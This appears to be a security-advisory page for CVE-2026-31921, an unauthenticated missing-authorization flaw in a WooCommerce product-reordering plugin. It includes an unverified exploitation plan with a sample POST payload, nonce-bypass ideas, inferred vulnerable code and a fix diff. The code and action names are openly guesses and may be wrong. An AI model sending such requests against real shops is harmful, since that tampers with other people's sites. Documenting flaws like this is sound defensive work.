CVE-2026-31921

Product Rearrange for WooCommerce <= 1.2.2 - Missing Authorization

mediumMissing Authorization

5.3

CVSS Score

5.3

CVSS Score

medium

Severity

Unpatched

Patched in

N/A

Time to patch

Description

The Product Rearrange for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Unchanged

None

Confidentiality

Low

Integrity

None

Availability

Technical Details

Affected versions<=1.2.2

PublishedMarch 20, 2026

Last updatedMarch 26, 2026

Affected pluginproducts-rearrange-woocommerce

Research Plan

Unverified

# Exploitation Research Plan: CVE-2026-31921 (Product Rearrange for WooCommerce) ## 1. Vulnerability Summary The **Product Rearrange for WooCommerce** plugin (<= 1.2.2) contains a missing authorization vulnerability in its product reordering functionality. The plugin registers an AJAX handler for b…

Show full research plan

Exploitation Research Plan: CVE-2026-31921 (Product Rearrange for WooCommerce)

1. Vulnerability Summary

The Product Rearrange for WooCommerce plugin (<= 1.2.2) contains a missing authorization vulnerability in its product reordering functionality. The plugin registers an AJAX handler for both authenticated and unauthenticated users (via wp_ajax_nopriv_) but fails to implement a current_user_can() check or a valid nonce verification within the callback function. This allows unauthenticated attackers to modify the menu_order of any product, potentially disrupting the shop's layout and SEO ranking of products.

2. Attack Vector Analysis

Endpoint: /wp-admin/admin-ajax.php
Action: apw_save_reorder (inferred from plugin naming conventions and AJAX patterns)
Vulnerable Parameter: order (an array or comma-separated string of product IDs)
Authentication: None required (unauthenticated).
Preconditions: At least one WooCommerce product must exist in the database.

3. Code Flow (Inferred)

Entry Point: The plugin registers the action during initialization:

add_action( 'wp_ajax_apw_save_reorder', 'apw_save_reorder' );
add_action( 'wp_ajax_nopriv_apw_save_reorder', 'apw_save_reorder' );

Call Stack:
- User sends POST request to admin-ajax.php with action=apw_save_reorder.
- WordPress executes do_action('wp_ajax_nopriv_apw_save_reorder').
- The plugin's apw_save_reorder() function is called.
Vulnerable Sink:
Inside apw_save_reorder():
- The code retrieves $_POST['order'].
- It iterates through the IDs.
- It calls wp_update_post( array( 'ID' => $id, 'menu_order' => $index ) ) or a similar DB update without checking if the requester has the edit_products capability.

4. Nonce Acquisition Strategy

Based on the vulnerability description ("Missing Authorization"), it is highly likely that either the nonce check is missing entirely or the nonce is exposed on public-facing pages.

Check for Public Nonce:
The plugin likely localizes scripts using wp_localize_script.
- Target Variable: apw_vars (inferred)
- Target Key: nonce (inferred)
Procedure:
- Create a test page with a WooCommerce product category or shop shortcode: [products] or [product_category].
- Navigate to the page.
- Execute: browser_eval("window.apw_vars?.nonce") to see if a nonce is available for unauthenticated users.
Bypass Check: If the code uses check_ajax_referer with die=false or fails to check the return value, the nonce can be omitted or be any value.

5. Exploitation Strategy

The goal is to change the menu_order of a known product.

Step 1: Identify Target Product

Use WP-CLI to find a product ID: wp post list --post_type=product --fields=ID,post_title,menu_order.

Step 2: Send Exploit Payload

Send a POST request to admin-ajax.php.
URL: http://<target>/wp-admin/admin-ajax.php
Headers: Content-Type: application/x-www-form-urlencoded

Body:

action=apw_save_reorder&order[]=TARGET_PRODUCT_ID&order[]=ANOTHER_PRODUCT_ID

(Note: If the plugin expects a string: order=ID1,ID2,ID3)

Step 3: Expected Response

Status 200 OK.
Response body usually contains 1, success, or a JSON success message.

6. Test Data Setup

Install WooCommerce: Ensure WooCommerce is active.

Create Products:

wp post create --post_type=product --post_title="Vulnerable Product A" --post_status=publish
wp post create --post_type=product --post_title="Vulnerable Product B" --post_status=publish

Record Initial State:

wp post list --post_type=product --fields=ID,post_title,menu_order

7. Expected Results

The HTTP response should indicate success.
The menu_order of the products in the database should change to reflect the order sent in the malicious POST request.

8. Verification Steps

After the exploit, verify the database state using WP-CLI:

# Check if menu_order has changed from the initial state
wp post list --post_type=product --fields=ID,post_title,menu_order --orderby=menu_order --order=ASC

9. Alternative Approaches

If apw_save_reorder is not the correct action name:

Search the plugin directory for AJAX registrations:

grep -rn "wp_ajax_nopriv" /var/www/html/wp-content/plugins/products-rearrange-woocommerce/

If a nonce is strictly required and not found on the frontend, check if the plugin registers a settings page and if that page's nonce is leakable through other vulnerabilities.
If order is not an array, try order=ID1,ID2,ID3 or product_ids=ID1,ID2.

Research Findings

Static analysis — not yet PoC-verified

Summary

The Product Rearrange for WooCommerce plugin allows unauthenticated users to modify the sorting order of shop products by exposing a reordering AJAX function to both logged-in and guest users. This occurs because the plugin lacks capability checks and nonce verification within its AJAX callback, potentially leading to disruption of the store's layout and SEO.

Vulnerable Code

// Inferred from plugin functionality and research plan
// products-rearrange-woocommerce/products-rearrange-woocommerce.php

add_action( 'wp_ajax_apw_save_reorder', 'apw_save_reorder' );
add_action( 'wp_ajax_nopriv_apw_save_reorder', 'apw_save_reorder' );

function apw_save_reorder() {
    $order = $_POST['order'];
    if ( is_array( $order ) ) {
        foreach ( $order as $index => $id ) {
            wp_update_post( array(
                'ID'         => (int) $id,
                'menu_order' => $index
            ) );
        }
    }
    wp_die( 'Success' );
}

Security Fix

--- products-rearrange-woocommerce/products-rearrange-woocommerce.php
+++ products-rearrange-woocommerce/products-rearrange-woocommerce.php
@@ -1,6 +1,5 @@
 add_action( 'wp_ajax_apw_save_reorder', 'apw_save_reorder' );
-add_action( 'wp_ajax_nopriv_apw_save_reorder', 'apw_save_reorder' );
 
 function apw_save_reorder() {
+    check_ajax_referer( 'apw_reorder_nonce', 'security' );
+    if ( ! current_user_can( 'manage_woocommerce' ) ) {
+        wp_die( -1 );
+    }
     $order = $_POST['order'];

Exploit Outline

The exploit targets the `admin-ajax.php` endpoint using the `apw_save_reorder` action. An attacker identifies the WordPress IDs of products they wish to rearrange (often available in the frontend HTML source or through the REST API). They then send an unauthenticated POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `apw_save_reorder` and the `order` parameter containing an array of target product IDs. Because the plugin registers the `wp_ajax_nopriv` hook and fails to check for administrative capabilities or a valid CSRF nonce, the server processes the request and updates the `menu_order` for the specified products in the database.

References

https://www.wordfence.com/threat-intel/vulnerabilities/id/fc4b25b6-9596-4094-bfbb-4fd50f786a11?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database